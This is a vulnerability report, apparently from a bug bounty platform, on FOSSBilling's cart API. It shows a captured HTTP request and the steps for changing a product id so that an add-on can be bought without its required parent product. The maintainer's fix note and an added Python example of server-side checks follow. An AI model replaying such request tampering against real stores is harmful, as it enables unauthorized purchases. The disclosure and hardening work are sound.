Users can order Add-Ons Separately in fossbilling/fossbilling
Reported on
Jun 11th 2023
Description
I found that add-ons are required to be purchased together with a product. However, a vulnerability has been discovered where an attacker can modify the product ID during the order process, allowing them to bypass the main product order requirement and directly purchase the add-on.
Proof of Concept
1. User orders the product
2. Hijack the request using Burp Suite:
POST /index.php?_url=/api/guest/cart/add_item HTTP/1.1
Host: localhost
Content-Length: 58
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
sec-ch-ua-platform: "macOS"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/orderbutton?order=8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: BOXCLR=e%3DdXNlcjNAdGVzdC5jb20%3D%26p%3DJDJ5JDEwJEltbDNnQXl0di8xdy5wZFpWQW9pNi40UVhsSnd3R2h5OENCT0VCYVp3ZmhGc2paU3N5UzJx; ADMIDIO_admidio_adm_SESSION_ID=28c355e130917b8a2f817792256db866; ADMIDIO_admidio_adm_cookieconsent_status=dismiss; PHPSESSID=9fd364ab4e45a218a605f6129bfec942; BBLANG=en_US
Connection: close
CSRFToken=593265e9721d74ae839c486bc5a96102&form_id=1&id=6&&multiple=1&id=1
3. Change id=1 to id=6
4. id=6 is the ID of an add-on
5. Send the request; it succeeds.
Impact
This vulnerability could potentially result in unauthorized purchases and financial loss.
Thanks for the report. I was able to validate this and I've proposed changes which both prevent add-ons from being added to the cart without an associated product and introduce checks to ensure the add-ons are valid for the selected product.
https://github.com/FOSSBilling/FOSSBilling/pull/1313
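The two checks the maintainer describes (no add-on in a cart without a parent product, and the add-on must actually belong to that product) can be shown with a small cart model. The following is an added example, not FOSSBilling's code and not the content of the linked pull request; the catalog, the cart shape and every function name are assumptions. It keeps the weak "trust the client's id" version beside the hardened one, and also re-validates the whole cart so removing a parent product cannot leave an orphaned add-on behind.

```python
# Added example (assumed model, not FOSSBilling code): server-side checks that
# stop an add-on from being ordered on its own or attached to the wrong product.
from dataclasses import dataclass


@dataclass(frozen=True)
class Product:
    id: int
    name: str
    # For add-ons: parent product IDs this add-on may be attached to.
    # Empty for ordinary products.
    addon_of: frozenset = frozenset()

    @property
    def is_addon(self) -> bool:
        return bool(self.addon_of)


# Constructed catalog: id 1 is a product, id 6 is an add-on belonging only to
# product 1 (matching the IDs in the report), id 7 is an add-on of product 2.
CATALOG = {
    1: Product(1, "Web hosting"),
    2: Product(2, "VPS"),
    6: Product(6, "Extra storage", frozenset({1})),
    7: Product(7, "Extra IPv4", frozenset({2})),
}


class CartError(ValueError):
    """Raised when a client-supplied product id is rejected."""


def add_item_unchecked(cart: list, product_id: int, catalog=CATALOG) -> list:
    """Weak version: only checks the id exists, so an add-on id sent on its
    own is accepted. This is the behaviour the report describes."""
    if product_id not in catalog:
        raise CartError("unknown product")
    cart.append(product_id)
    return cart


def add_item_checked(cart: list, product_id: int, catalog=CATALOG) -> list:
    """Hardened version: an add-on is accepted only when the cart already
    holds a product the add-on is permitted to attach to."""
    product = catalog.get(product_id)
    if product is None:
        raise CartError("unknown product")
    if product.is_addon and not (product.addon_of & set(cart)):
        raise CartError(
            f"add-on {product_id} requires one of {sorted(product.addon_of)} in the cart"
        )
    cart.append(product_id)
    return cart


def orphaned_addons(cart: list, catalog=CATALOG) -> list:
    """Add-on ids in the cart that have no permitted parent in the cart.
    Run this again at checkout, not just when an item is added."""
    present = set(cart)
    return [
        pid for pid in cart
        if catalog[pid].is_addon and not (catalog[pid].addon_of & present)
    ]


def remove_item(cart: list, product_id: int, catalog=CATALOG) -> list:
    """Removing a product also drops add-ons that would be left parentless."""
    remaining = [pid for pid in cart if pid != product_id]
    orphans = set(orphaned_addons(remaining, catalog))
    return [pid for pid in remaining if pid not in orphans]


if __name__ == "__main__":
    # The request from the report: id=6 with no product in the cart.
    print(add_item_unchecked([], 6))          # accepted by the weak version
    try:
        add_item_checked([], 6)
    except CartError as e:
        print("rejected:", e)                  # rejected by the hardened version
    print(add_item_checked([1], 6))           # [1, 6]: valid parent present
    print(remove_item([1, 6], 1))             # []: add-on goes with its parent
```

The add-time check alone is not enough: a cart can be edited after the add-on is accepted, so the same orphan check has to run again when the order is finalised, which is what orphaned_addons is for.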